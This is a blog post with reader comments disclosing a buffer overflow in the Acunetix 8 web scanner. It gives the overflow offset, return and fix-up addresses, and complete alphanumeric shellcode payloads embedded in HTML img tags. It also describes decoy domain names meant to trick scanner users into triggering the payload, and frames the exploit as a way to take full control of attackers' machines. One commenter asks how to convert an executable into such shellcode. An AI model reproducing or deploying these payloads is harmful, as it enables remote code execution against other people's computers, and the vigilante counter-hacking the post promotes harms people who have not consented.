A few weeks ago I have published
an article about WINRAR 0DAY.
For example, if we scan my blog “http://an7isec.blogspot.co.il”, we will get the result shown below:
That article revealed a new vulnerability
that gave attackers, the ability to perform spoofing attack.
Many people wrote to me about the
problems of that kind of article (for example).
So this time I’m goanna reveal a
new 0DAY that will help security managers to protect their web sites against
many vulnerability scans.
A lot of sites owners will tell
you that the majority numbers of scans, performed against their sites, are
performed by automatic tools like NESSUS, ACUNETIX, and APPSCAN.
Today 0DAY will be focused on one
of the most popular web scan in the world, ACUNETIX.
The POC will be against ACUNETIX
8 (build 20120704 since it’s one of the most common cracked version which was
published in the net and used by many newbie hackers).
This disclosure will not only reveal
a new vulnerability, but demonstrates a whole new perception of dealing with
external attacks.
Instead of protecting your web
sites again and again, or buying a new advanced WAF (web application firewall),
let’s give the attackers a reason to be afraid, reason to think twice before they
press the “SCAN” button.
In this article, I will not give
a full working exploit for all scan scenarios nor for all operating systems, but
a proof of concept that hopefully will grow into a new effort of research for vulnerabilities
in Penetration test tools.
So let’s get our hands dirty
ACUNETIX is a powerful tool for scanning
and finding vulnerabilities at websites.
Many newbie attackers tend to use
this tool due to the simplicity of its use.
ACUNETIX offers its users a simple
wizard base scan that covers many aspects of the vulnerability scan.
One of the aspects is the ability
to scan more domains or sub domains related to the scanned website.For example, if we scan my blog “http://an7isec.blogspot.co.il”, we will get the result shown below:
After a little research about
this option, I figured out that ACUNETIX starts its wizard by sending an HTTP
request to the site and learning about it from its HTTP response.
Furthermore the wizard learns about the
external related domains from the external sources that appear at the website,
for example:
“<img src=http://externalSource.com/someimg.png >”
“<a href=http://externalSource.com/ ></a>”
Etc...
Further Analysis reveals that if one
of the external domain name length is more than 268 Byte’s, ACUNETIX will
be crashed , so if we want to cause a crash, all we need to do is to put some
kind of external source at our site, which have the length of 268 Byte’s or more,
say something like this:
We need to remember that in order to enjoy our exploit, the newbie hacker must check our extra domain name, in the list of the extra domains in ACUNETIX wizard window.
The exploit can be download from here
<A href= “http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA”>
Quick view of this application in
Immunity Debugger reveals that EDX was corrupted by the fuzzing string which caused
access violation:
Despite the fact that further
writing runs over the Structured Exaction Handler (SEH) as you will probably
notice ,my advice for you is not to go that way, believe me I tried it for
several days with no success (because of the safe SHE mechanism).
However, we have another problem with
this exploit, In one word, “ASCII”.
ACUNETIX gets its information
about external domains as a URL.
This fact causing the string to
be converted into Web Browser friendly string.
While ASCII accepts chars like:
0x22 (“), 0x23 (#), 0x24 ($), 0x25 (%), 0x5C (\), 0x2F (/) and more …
URL string accepts only printable
alphanumeric chars and URL converted special chars (with few exceptions).
So if my external source contains
one of the special chars, they will be converted into
”%SOMETHING”.
For example, the
char "quotes" (“) will be converted into 253232 in the memory because
it’s the translation of %22.
Another example that demonstrates
the URL encoding is: the char "percent" (%) which will be converted into 253235 in the
memory.
Bypassing it, will be by building
an exploit that contains only "A-Z, a-z, 1-0" chars and few special
chars that aren’t converted in the process of URL ENCODE like:
"! ( ) = }
{ " .
(not a simple job at all)
In short, I had to find a way to
fix the flow of the application in order to avoid SEH based exploit (Because it
was impossible to bypass safe SHE protection with URL ASCII strings only).
Finally, I found a way.
In order to fix the flow, EDX had to be overwritten with a readable memory address.
In order to fix the flow, EDX had to be overwritten with a readable memory address.
Nevertheless, it is important to
remember that EDX is not been used as is, but minus 8:
MOVE ECX, DWORD PTR DS: [EDX-8];
Meaning that it doesn’t matter
which memory address we use, we should add 8 to the address (in the exploit),
convert the whole address into printable URL STRING, and hope to the best.
After little research, I found
such an address.
The address was at “0x663030XX” and
luckily it had the possibility to be converted into URL String without special
bad char's --> "
f005 ".
After playing with the code I
found that the exact location of that EDX overwrite, is at 268 Byte's offset.
So for now our exploit looks like
this:
<img src=”http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA500fBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB”>
Running ACUNETIX's scan against
that payload, caused the next result:
As you can see above, the EIP was
overwritten!!
It appears that the idea of
fixing the flow was successful since it enabled me to be in a better position
of attack (EIP overwrite).
Beside it, our potential space
for shell code is now presented in EAX and ESP.
When it comes to the decision whether
choosing ESP or EAX, ESP is a better choice from two different aspects:
One, ESP is pointing directly at
the beginning of the shell string.
Two, there is much more space for
a biggest shell code to be written.
After I chose ESP, I needed to
find an instruction of “JMP ESP” in a memory address that could be written by
URL string (limited ASCII as mention above).
The desired address successfully
founded at the location of: 0x7e79515d (SXS.DLL) –
(In ASCII “ ]Qy~ “).
After all that, our shell code supposed
to look like this:
<img src=”http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA500fBBBB]Qy~BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB”>
- 500f = 0x66303035 : readable memory location for fixing the flow of the application that was corrupted by the buffer overflow.
- ]Qy~ = 0x7e79515d (JMP ESP from SXS.DLL).
OK, right now we are at the semifinal
stage, running the application against above payload, produced the next result:
Yea… we landed exactly at the
beginning of the final payload.
The next step will be to use
suitable windows shell that will be made only from URL string (limited ASCII).
Such shell can be generated with
“ Metasploit ” and it is called "Alphanumeric Shell".
The important thing to remember while
using such payload, is that the payload's start address must be presented at
one of the registers. If the payload presents at ESP, the first OP CODE of the
shell need to be "PUSH ESP".
In my Proof of concept, I used
simple "CALC.EXE" shell code generated by “Metasploit that
led me to the final stage which is ;working exploit!!
Moreover, our exploit is successfully
bypassing DEP protection, simply by choosing only the addresses that aren’t
compiled with DEP.
And due to the fact that ACUNETIX
itself is not complied with DEP, this exploit should work perfectly on windows XP.
After successfully reaching all
our goals, Let’s look on the final working exploit:
<img src="http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA500fBBBB]Qy~TYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB
0BBXP8ACJJIHZXL9ID414ZTOKHI9LMUKVPZ6QO9X1P26QPZTW5S1JR7LCTKN8BGR3RWS9
JNYLK79ZZ165U2KKLC5RZGNNUC70NEPB9OUTQMXPNMMPV261UKL71ME2NMP7FQY0NOHKP
KZUDOZULDS8PQ02ZXM3TCZK47PQODJ8O52JNU0N72N28MZKLTNGU7ZUXDDXZSOMKL4SQK
UNKMJPOOCRODCMDKR0PGQD0EYIRVMHUZJDOGTUV2WP3OIVQ1QJSLSKGBLYKOY7NWWLNG6
LBOM5V6M0KF2NQDPMSL7XT80P61PBMTXYQDK5DMLYT231V649DZTPP26LWSQRLZLQK15X
UXYUNP1BPF4X6PZIVOTZPJJRUOCC3KD9L034LDOXX5KKXNJQMOLSJ6BCORL9WXQNKPUWN
KRKJ8JSNS4YMMOHT3ZQJOHQ4QJUQLN1VSLV5S1QYO0YA”>
We need to remember that in order to enjoy our exploit, the newbie hacker must check our extra domain name, in the list of the extra domains in ACUNETIX wizard window.
So what can we do in order to
make our domain name attractive?
Thinking about it, I came up with
two ideas:
1: writing some attempting domain
name that will make the hackers check that domain, like, ADMIN.ControlMangment.1249874350345.An7isec.blogspot.co.il .
2: using several external domains
with the following names:
“SQLINJECTION”
“XSS”
“CSRF”
And so on…
These kind of names will probably
give the eye of the hacker the feeling that the domain list window is actually
an options window.
The written code bellow
demonstrates that kind of misleading:
<html>
<img src="http://SQLInjection........................................
.....................................................................
.....................................................................
............AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA500fBBBB]Qy~TYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB
0BBXP8ACJJIHZXL9ID414ZTOKHI9LMUKVPZ6QO9X1P26QPZTW5S1JR7LCTKN8BGR3RWS9
JNYLK79ZZ165U2KKLC5RZGNNUC70NEPB9OUTQMXPNMMPV261UKL71ME2NMP7FQY0NOHKP
KZUDOZULDS8PQ02ZXM3TCZK47PQODJ8O52JNU0N72N28MZKLTNGU7ZUXDDXZSOMKL4SQK
UNKMJPOOCRODCMDKR0PGQD0EYIRVMHUZJDOGTUV2WP3OIVQ1QJSLSKGBLYKOY7NWWLNG6
LBOM5V6M0KF2NQDPMSL7XT80P61PBMTXYQDK5DMLYT231V649DZTPP26LWSQRLZLQK15X
UXYUNP1BPF4X6PZIVOTZPJJRUOCC3KD9L034LDOXX5KKXNJQMOLSJ6BCORL9WXQNKPUWN
KRKJ8JSNS4YMMOHT3ZQJOHQ4QJUQLN1VSLV5S1QYO0YA”>
<img src="http://XSS.................................................
.....................................................................
.....................................................................
...">
<img src="http://CSRF................................................
.....................................................................
.....................................................................
....">
<img src="http://DeepScan............................................
.....................................................................
.....................................................................
........">
<img src="http://NetworkScan.........................................
.....................................................................
.....................................................................
...........">
<img src="http://DenialOfService.....................................
.....................................................................
.....................................................................
...............">
</html>
In conclusion,
Following all the above, we
created a powerful exploit that Newbie hackers
will definitely fall
for.
This exploit will give us the
ability to do everything with all that nasty Newbie hackers that scan our sites
day and night, killing our traffic, filling all the web site forms with junk
and so on…
Furthermore it can be used in
order to collect smart intelligence about hostile forces who want to attack our
web application.
BUT!!
The more powerful idea that
motivated me to reveal this concept and POC, is the fact that this exploit is
Anonymity killer! , because even if the attacker uses the most smart and secure
proxy in the world, such as "TOR" and others, his ass will be revealed
and full control on his scanning machine will be gained.
Thanks all for reading my post,
hope you enjoy it,
Happy hunting, An7i
P.S.
Here is a fully functional exploit video and Perl
script that generates custom exploit:The exploit can be download from here
Nice Job
ReplyDeletebuild 20120704 is not the newest cracked version, not even close.
ReplyDeletewell, I can tell you that, newer version's are vulnerable too,I just I didn't mention that in my article but I tested it myself. version 9 is the only one that isn't vulnerable.
ReplyDeleteLatest Acunetix WVS is version 9.0 - Build: 20140422 and it is not vulnerable to this! Tested it and confirmed!
ReplyDeleteThis is awesome, epic idea and nicely implemented :-)
ReplyDeleteThanks for this awesome contribution. Was fun reading it :-)
ReplyDeleteExcellent article thanks for sharing !
ReplyDeletevery educational. nice find mate
ReplyDeletesuperb article
ReplyDeletenicely explained :D :D
thnx fr sharing :D :D (Y) (Y)
This is the danger hahahaha !
ReplyDeleteBut the important question
How can I convert my (Server.exe) to the Shell Code same?
Are there programs or is there video to explain this thing?
Awesome! love your writing :)
ReplyDeleteJust Great!
ReplyDeleteToo bad that a manager will never allow us to put it on the DMZ :(
It was very fun to read. Great idea and very nice research job! Greetings!
ReplyDeleteNice one, will keep following your blog!! I have never thought of this attack vector before.
ReplyDeleteAlso highly impressed of your finding with the winrar spoof... I have been thinking in similar path for a long time, and you showed me now it was possible..
Weissman@paranoici.org
This article can help .... I can read them with new knowledge ... thank you so much for what was given to me
ReplyDeleteThis is wonderful, thank you for sharing this valuable information, we look forward to more of these articles
ReplyDeletewow..... what a great blog. nice sharing. i like this blog. thanks for the sharing the superb information.its a nice posting.superb information. double girder eot crane manufacturer
ReplyDeletehoist manufacturer
No doubt it will be very useful for my future projects. Would like to see some other posts on the same subject! website designs pakistan
ReplyDeleteNice post.A valuable information here.Thanks for sharing with us.
ReplyDeleteEcommerce Website Design Palm beach
This disclosure will not only reveal a new vulnerability, but demonstrates a whole new perception of dealing with external attacks. focus financial payday company
ReplyDeletecan you re-upload the exploit.pl
ReplyDelete